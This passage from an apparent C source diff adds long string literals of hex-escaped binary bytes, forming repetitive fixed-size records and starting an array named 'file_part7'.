+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" 
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x12\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x1b" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +; +char file_part7[]= +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" 
+"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x4e\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" 
+"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\x82\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\xef\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" 
+"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x01\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x14\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" 
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" 
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" 
+"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00" +"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x9c\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" 
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" 
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" 
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" +"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" +"\x00\x30\x00\x00\x00\x00\x00\x00\xc2\x80\x00\x00\x00\x80\x01\x00" +"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" +"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" +"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" +"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" +"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" +"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" 